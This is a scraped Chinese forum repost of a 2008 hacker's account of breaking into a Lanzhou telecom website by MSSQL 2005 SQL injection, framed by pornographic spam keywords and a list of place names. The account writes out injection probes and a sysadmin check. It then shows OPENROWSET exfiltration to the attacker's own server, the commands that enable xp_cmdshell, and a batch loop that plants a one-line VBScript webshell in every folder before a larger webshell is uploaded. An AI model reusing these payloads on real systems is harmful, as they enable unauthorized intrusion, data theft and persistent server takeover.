最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

MSSQL2005注入攻擊

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 19:37:47   作者:佚名   我要評(píng)論
電信級(jí)的系統(tǒng)估計(jì)都是采用比較大型的數(shù)據(jù)庫(kù)了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!蘭州電信 號(hào)碼百事通的網(wǎng)站 居然是用IIS ASP!呵呵!ASP估計(jì)腳本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成靜態(tài)頁(yè)面技術(shù)! 呵呵~其實(shí)注入點(diǎn)并不是那么好找的!畢竟
電信級(jí)的系統(tǒng)估計(jì)都是采用比較大型的數(shù)據(jù)庫(kù)了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!蘭州電信 號(hào)碼百事通的網(wǎng)站 居然是用IIS ASP!呵呵!ASP估計(jì)腳本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成靜態(tài)頁(yè)面技術(shù)! 呵呵~其實(shí)注入點(diǎn)并不是那么好找的!畢竟是電信的大網(wǎng)站!測(cè)試了好多個(gè)點(diǎn)都失敗,我個(gè)人比較喜歡找那些片偏僻的url連接!那些80%的程序員都會(huì)疏忽~! OK 來(lái)個(gè)經(jīng)典 and 0=0 and 0=1 返回不一樣的結(jié)果!看來(lái)是數(shù)字輸入的了! 不說(shuō)太多~ 再看看是什么數(shù)據(jù)庫(kù) 跟ASP結(jié)合 80% 都是MSSQL了!不過(guò)也有例外的~呵呵例如第2代身份證驗(yàn)證的網(wǎng)站 我記得有好幾個(gè)是采用ASP/ASPX ORACLE 的!題外話就不多說(shuō)了!來(lái)點(diǎn)直接的!
and exists(select @@version)-- 返回正常哦~ 呵呵看來(lái)不會(huì)是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再來(lái)看看 SYBASE 沒(méi)有IS_SRVROLEMEMBER函數(shù)的!只有MS的才會(huì)有!而SYBASE判斷權(quán)限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是SA權(quán)限!
OK那么 就來(lái)個(gè)我的最愛(ài) OPENROWSET
先建一個(gè)表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把遠(yuǎn)程的表導(dǎo)到我自己機(jī)器上的MSSQL
發(fā)現(xiàn)報(bào)告錯(cuò)誤
不允許OPENROWSET ~~ 奇怪?? 難道是MSSQL2005?權(quán)限問(wèn)題?靠!那就開(kāi)唄!幸好是SA權(quán)限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--開(kāi)始分布式事務(wù)
現(xiàn)在來(lái)真的了!不過(guò)還是有我最擔(dān)心的~ 就是WEB跟DATABASE是分離的!這樣搞起來(lái)就郁悶了!OK!
既然是SA 那就把他的CMDSHELL都開(kāi)了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
這樣就可以開(kāi)啟CMDSHELL 但是還沒(méi)有添加擴(kuò)展存儲(chǔ)過(guò)程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其實(shí)沒(méi)有什么必要的~只是我為了方便防火墻!
再來(lái)執(zhí)行 exec master..xp_cmdshell 'ping 自己IP' 防火墻檢測(cè)到有對(duì)方IP ping自己了呵呵!然后再ping他的WEBSITE
看來(lái)是同一個(gè)IP哦~ 哈哈!那就爽了!那我就直接在他本地寫(xiě)一個(gè)bat吧!
隨便找個(gè)地方用xp_cmdshell寫(xiě)了個(gè)bat 內(nèi)容為
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell執(zhí)行 OK
在C盤(pán)下面所有文件夾都有這個(gè)1.asp了~ 呵呵 如此類推
把其他盤(pán)也感染.... 5分鐘過(guò)后!~ 他的所有盤(pán) 所有文件夾都有這個(gè) 1.asp的一句話~ 哈哈!來(lái)到www.lanzhouXXXXX.com 在他的web上面?zhèn)鱾€(gè)大馬子~KO~~... 記得收拾殘局!把之前的垃圾清除~呵呵

相關(guān)文章

最新評(píng)論

台江县| 同心县| 咸宁市| 竹北市| 扬中市| 塔河县| 兴安盟| 元阳县| 汉阴县| 揭西县| 桦川县| 静乐县| 安岳县| 湘乡市| 潢川县| 左云县| SHOW| 沙洋县| 义乌市| 台南市| 云阳县| 上饶县| 邢台县| 修武县| 石屏县| 固安县| 凤台县| 三江| 泸溪县| 同仁县| 镶黄旗| 丽水市| 兴海县| 馆陶县| 乌拉特中旗| 军事| 余江县| 孝昌县| 神农架林区| 保德县| 高碑店市|